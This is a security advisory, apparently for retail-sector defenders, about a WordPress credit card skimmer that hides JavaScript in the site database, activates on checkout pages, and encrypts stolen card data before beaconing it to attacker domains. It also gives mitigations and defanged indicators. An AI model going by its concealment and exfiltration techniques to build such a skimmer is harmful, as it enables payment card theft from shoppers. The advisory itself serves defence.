Executive Summary
A sophisticated credit card skimmer malware has been discovered targeting WordPress websites, stealthily injecting malicious JavaScript into the site’s database to steal sensitive payment information. This skimmer, designated malware.magento_shoplift.273 by Securi, specifically activates on checkout pages, either by hijacking legitimate payment fields or injecting fake credit card forms. The stolen data, including credit card numbers and billing information, is obfuscated using Base64 encoding and AES-CBC encryption before being sent to attacker-controlled domains. Due to its concealment in the WordPress database rather than typical file locations, it evades detection by common security tools
Community Impact
Retail and hospitality sector organizations, which heavily depend on e-commerce platforms for transactions, are particularly vulnerable to sophisticated and difficult to detect credit card skimmers. A successful attack could lead to widespread theft of customer payment data, resulting in fraudulent transactions and potential regulatory fines for data breaches. RH-ISAC Core Members are encouraged to review this report, the report linked above and ingest the Indicators of Compromise included below.
Technical Analysis
This credit card skimmer malware infiltrates WordPress websites by injecting obfuscated JavaScript into the wp_options database table, specifically targeting the widget_block entry. By embedding itself in the database rather than theme files or plugins, the malware evades traditional file-based malware scans. The malicious script only activates on checkout pages by checking if the URL contains “checkout,” ensuring it captures sensitive payment information without raising suspicion.
The malware dynamically creates a fake payment form that mimics legitimate processors like Stripe or hijacks existing form fields, allowing it to capture credit card numbers, CVV codes, expiration dates, and billing addresses in real-time. To avoid detection during data transmission, the malware obfuscates stolen data using Base64 encoding and AES-CBC encryption. It then silently exfiltrates this data to attacker-controlled domains (e.g., valhafather[.]xyz and fqbe23[.]xyz) using the navigator.sendBeacon function, which transmits data without disrupting user activity.
Mitigations
Sucuri has provided the following mitigation strategies, provided below for RH-ISAC Core Member awareness:
- Regular Updates: Outdated software is a primary target for attackers who exploit vulnerabilities in old plugins and themes. Avoid this by consistently updating your site and applying the latest security patches. Alternatively, deploy a Web Application Firewall (WAF) for virtual patching.
- Admin Account Management: Weak admin passwords are a gateway for attackers. Utilize two-factor authentication and regularly review all admin accounts to ensure their validity. Update passwords frequently, making sure to use strong, unique passwords to bolster security.
- File Integrity Monitoring: Implement file integrity monitoring to detect any unauthorized changes to your website files. This serves as an early warning system for rapid response to potential threats.
- Web Application Firewall: A website firewall can effectively block malicious traffic and prevent hacking attempts from reaching your server.
Indicators of Compromise
Below is small collection of malicious domains that have been flagged as potential indicators of compromise (IOCs) in relation to malware.magento_shoplift.273, provided by Sucuri:
- valhafather[.]xyz
- fqbe23[.]xyz
